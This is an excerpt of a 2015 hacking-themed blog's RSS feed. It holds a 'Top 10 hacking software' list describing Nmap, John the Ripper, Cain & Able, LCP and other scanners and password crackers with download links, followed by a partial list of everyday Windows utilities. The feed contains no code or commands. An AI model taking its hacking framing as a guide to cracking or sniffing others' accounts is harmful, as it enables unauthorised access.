</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUkFwRyzCXmTiMvECZ6nwLHVQlnSazataogNgofD55xL7FkukKC36icHzK25uCiQC0VOPUNFGorRTCx6_ZZg7muhTSjZn1h8NillCMoeU1dP9YzYkBIHyEInFKpbsRLV-k6xJ_CzjfQ8s/s72-c/images.jpg" width="72"/></item><item><title>Top 10 Hacking Software For Password &amp; Network Hacking </title><link>http://superhackings.blogspot.com/2015/08/top-10-hacking-software-for-password.html</link><category>Hacking Tools</category><category>Student Stories</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Sat, 22 Aug 2015 00:32:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-996041415214439162</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;There are many hacking software launched in past few years but only 
few of them are worth for it. I am collecting here some of the most used
 hacking tools or software that are used for hacking passwords, networks
 &amp;amp; sniffing. Just to let you know that hacking is not limited to use
 of these software, it is far beyond it, these tools are just for 
gathering some primary information, we call it passive attack gathering.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;h2&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;1. Nmap -&lt;/strong&gt;The&lt;strong&gt; &lt;/strong&gt;Network Mapper :&lt;/span&gt;&lt;/h2&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Nmap is one of the most widely used open source network mapping 
utility which scans &amp;amp; detects for ports, Operating systems, its 
services &amp;amp; used to manage networks. Nmap is available for windows 
&amp;amp; Linux also but it was&amp;nbsp; basically designed for a linux/Unix box, 
which works best with it also.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;&lt;a class="aligncenter" href="http://nmap.org/" target="_blank" title="Learn More about Nmap"&gt;Learn More about Nmap&lt;/a&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;&lt;a class="aligncenter" href="http://www.nmap.org/download.html" target="_blank" title="Download Nmap "&gt;Download Nmap&lt;/a&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;h2 style="text-align: left;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;2. John The Ripper Password Cracker&lt;/strong&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;John the Ripper is a fastest password cracker, Now available for many
 distros of Unix, DOS, Win32, BeOS, and OpenVMS. Its primary purpose is 
to detect weak Unix passwords. Besides several crypt(3) password hash 
types most commonly found on various Unix flavors, supported out of the 
box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several
 more with contributed patches. It is also well known as JTR, the most 
deadliest cracker of all time.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a class="aligncenter" href="http://www.openwall.com/john/" target="_blank" title="John The Ripper Download"&gt;&lt;strong&gt;Learn More About John The Ripper&lt;/strong&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a class="aligncenter" href="http://www.openwall.com/john/" target="_blank" title="John The Ripper Download"&gt;&lt;strong&gt;Download John The Ripper&lt;/strong&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;h2 style="text-align: left;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;3. Nessus Remote Security Scanner&lt;/span&gt;&lt;/h2&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Nessus is basically a vulnerability scanner used by most of the well 
known organizations of the world for making their security audits. 
Nessus were open source in past, but now its a closed source one but a 
free software, which scans for thousands of general &amp;amp; critical 
vulnerability problems in any network.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;&lt;a href="http://www.nessus.org/download/" title="Nessus"&gt;Learn More About Nessus&lt;br /&gt;
&lt;/a&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;&lt;a href="http://www.nessus.org/download/" title="Nessus"&gt;Download Nessus&lt;/a&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;h2&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;4. Wireshark – The Sniffer&lt;/span&gt;&lt;/h2&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;It was formerly knows as Eathereal. It&amp;nbsp; is&amp;nbsp; network protocol 
analyzer, or sniffer, that lets you capture and interactively browse the
 contents of network frames. Its open sources’ness gives it to grow from
 all dimensions &amp;amp; it gives more than a quality network analyzers 
that are present in the market.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;It have a GUI works great with both Linux &amp;amp; Windows.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;&lt;a href="http://www.wireshark.org/" target="_blank" title="Wireshark"&gt;Learn More About Wireshark&lt;br /&gt;
&lt;/a&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;&lt;a href="http://www.wireshark.org/" target="_blank" title="Wireshark"&gt;Download Wireshark&lt;/a&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;h2&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;5. Eraser&lt;/span&gt;&lt;/h2&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Eraser is an advanced security tool (for &lt;em&gt;Windows&lt;/em&gt;). We can 
completely remove sensitive data from your hard drive by overwriting it 
several times which is done with carefully selected patterns. Eraser is 
Free software and its source code is released under GNU General Public 
License as it is a open source one. Works with all versions of windows 
as -&amp;gt; Windows 95, 98, ME, NT, 2000, XP and DOS.&amp;nbsp; Its great tool for 
hiding secret things &amp;amp; mainly deleting it.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;&lt;a href="http://www.heidi.ie/eraser/download.php" target="_blank" title="Eraser"&gt;Learn More About Eraser&lt;br /&gt;
&lt;/a&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;&lt;a href="http://www.heidi.ie/eraser/download.php" target="_blank" title="Eraser"&gt;Download Eraser&lt;/a&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;h2&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;6. LCP – Windows Password Cracker&lt;/span&gt;&lt;/h2&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;LCP is one of the well known free software for cracking windows 
passwords in many versions like Windows NT/2000/XP/2003. Accounts 
information import, Passwords recovery, Brute force session 
distribution, Hashes computing can be easily done by LCP. It is similar 
to LOphtcrack.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;It have various modes like bruteforce, dictionary attack &amp;amp; hybrid attack.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;Learn More About LCP&lt;br /&gt;
&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;Download LCP&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;h2&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;7. Cain &amp;amp; Able Passwords Cracker&lt;/span&gt;&lt;/h2&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Its another password cracker for windows based system. P It collects 
passwords by sniffing the network, cracking encrypted passwords using 
Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP 
conversations, decoding scrambled passwords, uncovering cached 
passwords, revealing password boxes,and analyzing routing protocols.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Interesting part is it sniffs itself, we don’t have to search for password files of any kind.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;&lt;a href="http://www.oxid.it/cain.html" target="_blank" title="Cain &amp;amp; Able"&gt;Learn More About Cain &amp;amp; Able&lt;br /&gt;
&lt;/a&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;&lt;a href="http://www.oxid.it/cain.html" target="_blank" title="Cain &amp;amp; Able"&gt;Download Cain &amp;amp; Able&lt;/a&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;h2&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;8.&lt;strong&gt;SuperScan- Port Scanner&lt;br /&gt;
&lt;/strong&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Superscan is great TCP/IP port scanner which is widely used for detecting the open ports or live hosts in given IP ranges.&lt;strong&gt; &lt;/strong&gt;It have a GUI &amp;amp; made for windows &amp;amp; easy to use, don’t miss it.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;Learn More About Superscan&lt;br /&gt;
&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;Download Superscan&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;h2&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;9. Nikto – CGI Scanner&lt;br /&gt;
&lt;/strong&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Nikto is a great CGI scanner, which&amp;nbsp; is an Open Source (GPL) web 
server scanner which performs comprehensive tests against web servers 
for multiple items. Which includes 3200 potentially dangerous 
files/CGIs, versions on over 625 servers, and version specific problems 
on over 230 servers.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;Learn More About Nikto&lt;br /&gt;
&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;Download Nikto&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;h2&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;10. Pof&lt;/span&gt;&lt;/h2&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Passive OS fingerprinting tool used widely for scanning operating system and it can scan for any operating system.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;P0f can identify the operating system on:&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;– SYN Mode&lt;br /&gt;
– SYN+ACK mode,&lt;br /&gt;
– RST+ mode,&lt;br /&gt;
– machines whose communications you can observe.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;It listens to any communication for detecting OS&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;&lt;a class="aligncenter" href="http://lcamtuf.coredump.cx/p0f/p0f.shtml" target="_blank" title="Poff Download"&gt;Learn More About Pof&lt;br /&gt;
&lt;/a&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;&lt;a class="aligncenter" href="http://lcamtuf.coredump.cx/p0f/p0f.shtml" target="_blank" title="Poff Download"&gt;Download Pof&lt;/a&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</description></item><item><title>Top 10 Most Useful Windows Programs to Have On Hand</title><link>http://superhackings.blogspot.com/2015/08/top-10-most-useful-windows-programs-to.html</link><category>Computer Security</category><category>software</category><category>Wifi WPA WEP Wireless Hacking</category><category>WINDOWS</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Sat, 22 Aug 2015 00:26:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-3994477188577120987</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="has-media media-640 has-image" data-textannotation-id="1455a011ad1dd9038dd6ffc1cb462d88"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="lightBoxWrapper"&gt;&lt;span class="img-border"&gt;&lt;img alt="Top 10 Incredibly Useful Windows Programs to Have On Hand" class="js_annotatable-image cursor-crosshair" data-asset-url="http://i.kinja-img.com/gawker-media/image/upload/s--ZwXtQLjv--/1379693777102741830.jpg" data-chomp-id="1379693777102741830" data-format="jpg" data-original-src="https://i.kinja-img.com/gawker-media/image/upload/1379693777102741830.jpg" height="358" src="http://i.kinja-img.com/gawker-media/image/upload/s--ZwXtQLjv--/1379693777102741830.jpg" width="636" /&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="has-media media-640 has-image" data-textannotation-id="1455a011ad1dd9038dd6ffc1cb462d88"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="has-media media-640 has-image" data-textannotation-id="1455a011ad1dd9038dd6ffc1cb462d88"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Some apps are essential,
 and you use them every day. Everyone knows their names: Firefox, VLC, 
7-Zip, and so on. However, there’s another class of app that gets less 
attention: the apps that are insanely useful to have in your back pocket
 on the rare occasions you need them. Here are 10 of our favorites.&lt;/span&gt;&lt;/div&gt;
&lt;aside class="referenced-wide referenced-fullwidth js_inset tmpl_referencedGroupFullWidth clearfix core-decorated-inset"&gt;&lt;div class="container"&gt;
&lt;div class="referenced-item " data-inset-id="1555978194"&gt;
&lt;div class="text  small-offset-3 "&gt;
            
                &lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="referenced-item-excerpt hide-for-small"&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;
        &lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/aside&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;


























&lt;/span&gt;&lt;h3 data-textannotation-id="c26febb0b40d8c25a5d611ff2e3c5ef6"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;10. Speccy&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;








&lt;/span&gt;&lt;div class="has-media media-640 has-image" data-textannotation-id="3340ce9d7052f5025ce44c1a3a490f97"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="lightBoxWrapper"&gt;&lt;span class="img-border"&gt;&lt;img alt="Top 10 Incredibly Useful Windows Programs to Have On Hand" class="js_annotatable-image cursor-crosshair" data-asset-url="http://i.kinja-img.com/gawker-media/image/upload/s--LhZ8rQfD--/1379693777208451398.jpg" data-chomp-id="1379693777208451398" data-format="jpg" data-original-src="https://i.kinja-img.com/gawker-media/image/upload/1379693777208451398.jpg" height="358" src="http://i.kinja-img.com/gawker-media/image/upload/s--LhZ8rQfD--/1379693777208451398.jpg" width="636" /&gt;&lt;/span&gt;&lt;span class="magnifier lightBox"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="has-media media-640 has-image" data-textannotation-id="3340ce9d7052f5025ce44c1a3a490f97"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="has-media media-640 has-image" data-textannotation-id="3340ce9d7052f5025ce44c1a3a490f97"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Maybe you’ve forgotten what kind of RAM you bought, or want a quick glance at your CPU’s temperature. &lt;a href="http://www.piriform.com/speccy" target="_blank"&gt;Speccy&lt;/a&gt; scans your machine and gives you a complete rundown of everything,
 from model numbers to temperatures, fan speeds, S.M.A.R.T. status, 
and...well, pretty much anything else you can think of. It’s also 
available in portable form, so you don’t have to install anything—just 
stick it in a folder for when you really need it. For an alternative, check out HWiNFO.










&lt;/span&gt;&lt;/div&gt;
&lt;h3 data-textannotation-id="5cb3b0fa383db93484205a252de811d9"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;9. Ultimate Windows Tweaker&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;








&lt;/span&gt;&lt;div class="has-media media-640 has-image" data-textannotation-id="5034ecd3ece34838dc67ac9524a423b2"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="lightBoxWrapper"&gt;&lt;span class="img-border"&gt;&lt;img alt="Top 10 Incredibly Useful Windows Programs to Have On Hand" class="js_annotatable-image cursor-crosshair" data-asset-url="http://i.kinja-img.com/gawker-media/image/upload/s--eUAbVZJu--/1379693777255001414.jpg" data-chomp-id="1379693777255001414" data-format="jpg" data-original-src="https://i.kinja-img.com/gawker-media/image/upload/1379693777255001414.jpg" height="358" src="http://i.kinja-img.com/gawker-media/image/upload/s--eUAbVZJu--/1379693777255001414.jpg" width="636" /&gt;&lt;/span&gt;&lt;span class="magnifier lightBox"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="has-media media-640 has-image" data-textannotation-id="5034ecd3ece34838dc67ac9524a423b2"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="has-media media-640 has-image" data-textannotation-id="5034ecd3ece34838dc67ac9524a423b2"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;When you 
first install Windows, you probably get everything set up just the way 
you like it, including all your favorite little Registry hacks and 
unsupported tweaks. You might even discover new ones later and try them 
out. Apps like Ultimate Windows Tweaker make this a lot easier, and they’re useful to keep around later if you start incorporating new things into your workflow. Its list of features is endless,
 allowing you to tweak the tiniest features in the taskbar, Windows 
Explorer, the lock screen, and anything else you could imagine. Download
 it once and keep it forever (and as always, back up before you start 
tweaking your system).








&lt;/span&gt;&lt;/div&gt;
&lt;h3 data-textannotation-id="76e0c9d5324721bce82080bcfb32d7cd"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;8. Stress Testing Utilities&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;








&lt;/span&gt;&lt;div class="has-media media-640 has-image" data-textannotation-id="9de8dca39de4e6b7bb15c7911defec09"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="lightBoxWrapper"&gt;&lt;span class="img-border"&gt;&lt;img alt="Top 10 Incredibly Useful Windows Programs to Have On Hand" class="js_annotatable-image cursor-crosshair" data-asset-url="http://i.kinja-img.com/gawker-media/image/upload/s--QQ755sqw--/1379693777310192966.jpg" data-chomp-id="1379693777310192966" data-format="jpg" data-original-src="https://i.kinja-img.com/gawker-media/image/upload/1379693777310192966.jpg" height="358" src="http://i.kinja-img.com/gawker-media/image/upload/s--QQ755sqw--/1379693777310192966.jpg" width="636" /&gt;&lt;/span&gt;&lt;span class="magnifier lightBox"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="has-media media-640 has-image" data-textannotation-id="9de8dca39de4e6b7bb15c7911defec09"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="has-media media-640 has-image" data-textannotation-id="9de8dca39de4e6b7bb15c7911defec09"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Overclockers are probably very familiar with stress testing utilities like &lt;a href="http://www.mersenne.org/freesoft/" target="_blank"&gt;Prime95&lt;/a&gt;, &lt;a href="http://www.xtremesystems.org/forums/showthread.php?201670-LinX-A-simple-Linpack-interface" target="_blank"&gt;LinX&lt;/a&gt;, and &lt;a href="http://www.aida64.com/" target="_blank"&gt;AIDA64&lt;/a&gt;.
 If you’ve overclocked your CPU, you should definitely keep these 
around, but they can be useful for non-overclockers too. When your 
processor is having issues, it can be difficult to diagnose. If some of 
your apps are crashing, a stress test like Prime95 can help you figure 
out whether your CPU is the problem (or whether it’s something else). 
Many folks also recommend giving a new computer a stress test to make 
sure there aren’t any problems. Most of these are also portable, so you 
can throw them in a folder and start them up when you need them.





































&lt;/span&gt;&lt;/div&gt;
&lt;h3 data-textannotation-id="e94bcc2944eafa83b0e1f51911b44514"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;7. MalwareBytes, VirusTotal, and AdwCleaner&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;








&lt;/span&gt;&lt;div class="has-media media-640 has-image" data-textannotation-id="c8131ddc9b9814ee12f0ab7548edccc8"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="lightBoxWrapper"&gt;&lt;span class="img-border"&gt;&lt;img alt="Top 10 Incredibly Useful Windows Programs to Have On Hand" class="js_annotatable-image cursor-crosshair" data-asset-url="http://i.kinja-img.com/gawker-media/image/upload/s--iVoqD6Gq--/1379693777532810054.jpg" data-chomp-id="1379693777532810054" data-format="jpg" data-original-src="https://i.kinja-img.com/gawker-media/image/upload/1379693777532810054.jpg" height="358" src="http://i.kinja-img.com/gawker-media/image/upload/s--iVoqD6Gq--/1379693777532810054.jpg" width="636" /&gt;&lt;/span&gt;&lt;span class="magnifier lightBox"&gt;&lt;/span&gt;&lt;/span&gt;We put 
these in the same category since they all protect you from unwanted 
programs, but they’re each useful in their own right. You probably have a good antivirus program
 running all the time, but no antivirus program catches everything—so 
it’s useful to have a secondary program to check once in awhile. &lt;a href="http://www.malwarebytes.org/" target="_blank"&gt;MalwareBytes&lt;/a&gt; is great because it only works on-demand, which means it won’t conflict with your always-running antivirus tool. The &lt;a href="https://www.virustotal.com/en/documentation/desktop-applications/virustotal-uploader" target="_blank"&gt;VirusTotal Uploader&lt;/a&gt;,
 on the other hand, lets you scan any individual file with over 50 
antivirus tools at once, so it’s great if you’ve downloaded something 
you think might be fishy. Lastly, if you’ve accidentally installed an 
annoying toolbar on your system that just won’t go away, &lt;a href="https://toolslib.net/downloads/viewdownload/1-adwcleaner/" target="_blank"&gt;AdwCleaner&lt;/a&gt; will help you get rid of it.










&lt;/span&gt;&lt;/div&gt;
&lt;aside class="referenced-wide referenced-fullwidth js_inset tmpl_referencedGroupFullWidth clearfix core-decorated-inset"&gt;
    &lt;div class="container"&gt;
        
            
    &lt;div class="referenced-item " data-inset-id="1555946224"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="text  small-offset-3 "&gt;
            
                &lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="referenced-item-excerpt hide-for-small"&gt;&lt;/span&gt;&lt;/span&gt; 
            
        &lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/aside&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;


























&lt;/span&gt;&lt;h3 data-textannotation-id="c490d1939da0df188721f62d84435e49"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;6. Magical Jelly Bean KeyFinder&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;








&lt;/span&gt;&lt;div class="has-media media-640 has-image" data-textannotation-id="77458b3eb0b0c091879d667295bfa8a4"&gt;
